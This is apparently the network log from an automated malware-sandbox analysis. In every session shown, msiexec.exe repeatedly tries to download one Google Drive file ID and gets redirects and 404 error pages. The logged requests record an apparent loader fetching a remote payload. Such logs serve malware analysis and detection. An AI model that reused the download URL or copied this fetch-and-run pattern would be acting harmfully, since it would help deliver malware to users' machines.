                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:55 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:55 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-EnZNZvBrN7WLywIHWbiaJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.550007142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:55 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:56 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC7MEz8qGqqy9_CAY0hZZEk_6DaWDzZD3V_6qbx1mOV-vRKab-_Xqp35SB8mfwM_W997iVMPgnE
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:56 GMT
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce--SHLeh6vrOfDdfWC5G8ILg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 67 56 69 4f 67 76 74 57 55 7a 74 38 70 58 35 4d 4e 6d 64 5f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OgViOgvtWUzt8pX5MNmd_g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.550008142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:57 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:57 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:57 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: script-src 'nonce-g1w1hwRA75bZbI4qs9iMaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.550009142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:58 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:58 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4cSLty2WprZCEEgONWuTPD0bjwfVdnUxotEG-PUsvSrLC1l9phnn4R84iQIJc5CArdRNSj6TM
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:58 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-EMWIIizxxDDemkPbflf8eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 42 68 6c 44 7a 52 47 56 58 62 4e 48 32 5a 67 6d 43 39 70 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HBhlDzRGVXbNH2ZgmC9pfg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.550010142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:59 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:59 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:59 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-IDUk8SRcwwTSQXlSMM9VKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.550011142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:01 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:02 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgT8QAXtimtvdxAwHQsfme5sC9tRU0hJROS0VflVYYdYEGGKNEq3Xa_RgxZ4-t5YGDv3
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:01 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-1NXQ3Wdh19Mzs9Lks2BCpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 77 4c 32 72 43 39 33 47 5a 49 57 39 61 65 57 64 41 44 34 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uwL2rC93GZIW9aeWdAD4Mg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.550012142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:02 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:03 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:03 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-2pNmgRNaZOoTmpbBB9wv3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.550013142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:03 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:04 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgQATzvO-q68-mRamZCZS5XV8JcDs0riUGMs_cZRVDusMfiCSs48_kXZUeJWUDspptot
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:04 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-FKgAZquZlGMMqvVGgleGpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
